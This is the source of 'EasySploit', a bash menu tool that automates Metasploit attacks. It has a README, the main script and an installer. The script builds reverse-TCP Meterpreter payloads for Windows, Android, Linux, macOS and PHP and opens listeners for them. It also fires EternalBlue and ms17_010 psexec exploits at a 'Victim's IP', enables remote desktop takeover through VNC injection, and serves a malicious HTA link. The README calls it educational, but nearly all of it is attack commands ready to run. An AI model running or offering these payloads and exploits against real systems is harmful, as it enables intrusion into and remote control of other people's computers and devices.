├── README.md ├── easysploit └── installer.sh /README.md: -------------------------------------------------------------------------------- 1 | # EasySploit 2 | EasySploit v4.2 (Linux) - Metasploit automation (EASIER and FASTER than EVER) 3 | 4 | # Disclaimer: 5 | 6 | Usage of EASYSPLOIT for attacking targets without prior mutual consent is 7 | ILLEGAL. Developers are not responsible for any damage caused by this script. 8 | EASYSPLOIT is intented ONLY FOR EDUCATIONAL PURPOSES!!! STAY LEGAL!!! 9 | 10 | # Options: 11 | 12 | (1) Windows --> test.exe (payload and listener) 13 | 14 | (2) Android --> test.apk (payload and listener) 15 | 16 | (3) Linux --> test.py (payload and listener) 17 | 18 | (4) MacOS --> test.jar (payload and listener) 19 | 20 | (5) Web --> test.php (payload and listener) 21 | 22 | (6) Scan if a target is vulnerable to ms17_010 23 | 24 | (7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue) 25 | 26 | (7rd) Enable Remote Desktop (ms17_010_eternalblue) 27 | 28 | (8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec) 29 | 30 | (8rd) Enable Remote Desktop (ms17_010_psexec) 31 | 32 | (9) Exploit Windows with a link (HTA Server) 33 | 34 | (10) Contact with us - Our accounts 35 | 36 | 37 | # How to install (The terminal must be launched as root user): 38 | 39 | git clone https://github.com/KALILINUXTRICKSYT/easysploit.git 40 | 41 | cd easysploit 42 | 43 | bash installer.sh 44 | 45 | # How to run (after installation): 46 | 47 | Type anywhere in your terminal "easysploit". 48 | 49 | # Video tutorials: 50 | 51 | https://www.youtube.com/watch?v=v3xn9MDmTaY 52 | 53 | https://www.youtube.com/watch?v=9J479dModb8 54 | 55 | https://www.youtube.com/watch?v=UOUry9ov9rM 56 | 57 | 58 | # Support us: 59 | 60 | https://www.patreon.com/kalilinuxtricks 61 | -------------------------------------------------------------------------------- /easysploit: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # easysploit 4 | i="0" 5 | resize -s 27 80 6 | clear 7 | while [ $i -lt 1 ] 8 | do 9 | clear 10 | ip=$(ip addr show wlan0 | awk '/inet / {print $2}' | cut -d/ -f 1) 11 | 12 | echo -e '\e[1;33m 13 | ______ _____ __ _ __ 14 | / ____/___ ________ __/ ___/____ / /___ (_) /_ 15 | / __/ / __ `/ ___/ / / /\__ \/ __ \/ / __ \/ / __/ 16 | / /___/ /_/ (__ ) /_/ /___/ / /_/ / / /_/ / / /_ v4.2 17 | /_____/\__,_/____/\__, //____/ .___/_/\____/_/\__/ (Linux) 18 | /____/ /_/ \e[1;34m 19 | Created by "KALI LINUX TRICKS" 20 | https://www.youtube.com/c/KALILINUXTRICKS\e[0m \e[1;31m 21 | 22 | Usage of EASYSPLOIT for attacking targets without prior mutual consent is 23 | ILLEGAL. Developers are not responsible for any damage caused by this script. 24 | EASYSPLOIT is intented ONLY FOR EDUCATIONAL PURPOSES!!! STAY LEGAL!!! 25 | \e[1;32m 26 | (1) Windows --> test.exe (payload and listener) 27 | (2) Android --> test.apk (payload and listener) 28 | (3) Linux --> test.py (payload and listener) 29 | (4) MacOS --> test.jar (payload and listener) 30 | (5) Web --> test.php (payload and listener) 31 | (6) Scan if a target is vulnerable to ms17_010 32 | (7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue) 33 | (7rd) Enable Remote Desktop (ms17_010_eternalblue) 34 | (8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec) 35 | (8rd) Enable Remote Desktop (ms17_010_psexec) 36 | (9) Exploit Windows with a link (HTA Server) 37 | (10) Contact with us - Our accounts 38 | ' 39 | 40 | service postgresql start 41 | exe='1' 42 | apk='2' 43 | py='3' 44 | jar='4' 45 | php='5' 46 | scan='6' 47 | eternalblue='7' 48 | eternalbluerd='7rd' 49 | psexec='8' 50 | psexecrd='8rd' 51 | hta='9' 52 | me='10' 53 | 54 | 55 | 56 | read x 57 | 58 | if [ "$x" == "$exe" ]; then #EXE 59 | msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=4444 -f exe > /root/Desktop/test.exe 60 | echo -e ' 61 | 62 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 63 | !Your payload: /root/Desktop/test.exe! 64 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 65 | 66 | Waiting for listener... 67 | 68 | ' 69 | 70 | msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;" 71 | 72 | 73 | elif [ "$x" == "$apk" ]; then #APK 74 | msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.apk 75 | echo -e ' 76 | 77 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 78 | !Your payload: /root/Desktop/test.apk! 79 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 80 | 81 | Waiting for listener... 82 | 83 | ' 84 | 85 | msfconsole -q -x " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;" 86 | 87 | 88 | 89 | 90 | elif [ "$x" == "$py" ]; then #PYTHON 91 | msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.py 92 | echo -e ' 93 | 94 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 95 | !Your payload: /root/Desktop/test.py! 96 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 97 | 98 | Waiting for listener... 99 | 100 | ' 101 | 102 | msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;" 103 | 104 | 105 | 106 | elif [ "$x" == "$jar" ]; then #JAVA 107 | msfvenom -p java/meterpreter/reverse_tcp lhost=$ip lport=4444 -f jar > /root/Desktop/test.jar 108 | echo -e ' 109 | 110 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 111 | !Your payload: /root/Desktop/test.jar! 112 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 113 | 114 | Waiting for listener... 115 | 116 | ' 117 | 118 | msfconsole -q -x " use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;" 119 | 120 | 121 | 122 | 123 | 124 | 125 | elif [ "$x" == "$php" ]; then #PHP 126 | msfvenom -p php/meterpreter/reverse_tcp lhost=$ip lport=4444 > /root/Desktop/test.php 127 | echo -e ' 128 | 129 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 130 | !Your payload: /root/Desktop/test.php! 131 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 132 | 133 | Waiting for listener... 134 | 135 | ' 136 | 137 | msfconsole -q -x " use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;" 138 | 139 | 140 | 141 | 142 | elif [ "$x" == "$scan" ]; then #SCAN 143 | echo "Victim's IP:" 144 | read r 145 | 146 | msfconsole -q -x " use auxiliary/scanner/smb/smb_ms17_010; set rhosts $r ; exploit ;exit ;" 147 | echo ' ' 148 | echo ' Press ENTER to Main Menu ' 149 | echo ' ' 150 | read 151 | 152 | 153 | elif [ "$x" == "$eternalblue" ]; then #ETERNALBLUE 154 | echo "Victim's IP:" 155 | read r 156 | 157 | msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/meterpreter/reverse_tcp; set lhost $ip ; set rhost $r ; exploit ; " 158 | 159 | 160 | 161 | elif [ "$x" == "$eternalbluerd" ]; then #ETERNALBLUERD 162 | echo "Victim's IP:" 163 | read r 164 | 165 | msfconsole -q -x " use exploit/windows/smb/ms17_010_eternalblue; set payload windows/x64/vncinject/reverse_tcp; set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; " 166 | 167 | 168 | 169 | 170 | elif [ "$x" == "$psexec" ]; then #PSEXEC 171 | echo "Victim's IP:" 172 | read r 173 | 174 | msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set lhost $ip ; set rhost $r ; exploit ;" 175 | 176 | 177 | elif [ "$x" == "$psexecrd" ]; then #PSEXECRD 178 | echo "Victim's IP:" 179 | read r 180 | 181 | msfconsole -q -x " use exploit/windows/smb/ms17_010_psexec; set payload windows/vncinject/reverse_tcp; set lhost $ip ; set rhost $r ; set viewonly false ; exploit ; " 182 | 183 | 184 | 185 | elif [ "$x" == "$hta" ]; then #HTA 186 | echo 'Uripath: (/)' 187 | read u 188 | msfconsole -q -x " use exploit/windows/misc/hta_server; set srvhost $ip; set uripath /$u; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; exploit ;" 189 | 190 | 191 | 192 | elif [ "$x" == "$me" ]; then #CONTACT WITH ME 193 | 194 | clear 195 | 196 | echo -e '\e[1;33m 197 | 198 | mmmmmm mm mmmm m m mmmm mmmmm m mmmm mmmmm mmmmmmm 199 | # ## #" " "m m" #" " # "# # m" "m # # 200 | #mmmmm # # "#mmm "#" "#mmm #mmm#" # # # # # 201 | # #mm# "# # "# # # # # # # 202 | #mmmmm # # "mmm#" # "mmm#" # #mmmmm #mm# mm#mm # v4.2 \e[0m 203 | 204 | 205 | \e[1;31m 206 | https://www.youtube.com/c/KALILINUXTRICKS 207 | \e[1;32m 208 | https://github.com/KALILINUXTRICKSYT 209 | \e[1;34m 210 | https://www.twitter.com/KALILINUXTRICKS 211 | \e[1;35m 212 | https://www.instagram.com/kali_linux_tricks_youtube 213 | \e[1;33m 214 | https://www.patreon.com/kalilinuxtricks 215 | \e[1;37m 216 | kalilinuxtricks@gmail.com 217 | 218 | 219 | Press ENTER to Main Menu 220 | ' 221 | read 222 | 223 | 224 | else 225 | 226 | n 227 | 228 | 229 | fi 230 | 231 | done 232 | 233 | 234 | -------------------------------------------------------------------------------- /installer.sh: -------------------------------------------------------------------------------- 1 | chmod +x easysploit 2 | cp -r easysploit /usr/local/sbin 3 | echo "rm -rf /usr/local/sbin/easysploit && echo -e '\e[1;31m 4 | 5 | (UNINSTALLATION COMPLETED) 6 | 7 | \e[0m' && rm uninstaller.sh " > uninstaller.sh 8 | 9 | 10 | 11 | echo -e '\e[1;33m 12 | ______ _____ __ _ __ 13 | / ____/___ ________ __/ ___/____ / /___ (_) /_ 14 | / __/ / __ `/ ___/ / / /\__ \/ __ \/ / __ \/ / __/ 15 | / /___/ /_/ (__ ) /_/ /___/ / /_/ / / /_/ / / /_ v4.2 16 | /_____/\__,_/____/\__, //____/ .___/_/\____/_/\__/ (Linux) 17 | /____/ /_/ \e[1;34m 18 | 19 | Created by "KALI LINUX TRICKS" 20 | https://www.youtube.com/c/KALILINUXTRICKS\e[1;31m 21 | 22 | 23 | Usage of EASYSPLOIT for attacking targets without prior mutual consent is 24 | ILLEGAL. Developers are not responsible for any damage caused by this script. 25 | EASYSPLOIT is intented ONLY FOR EDUCATIONAL PURPOSES!!! STAY LEGAL!!! 26 | 27 | \e[1;36m 28 | 29 | (INSTALLATION COMPLETED) 30 | 31 | \e[1;32m 32 | 33 | To execute EasySploit type anywhere in your terminal "easysploit". \e[0m 34 | ' 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | --------------------------------------------------------------------------------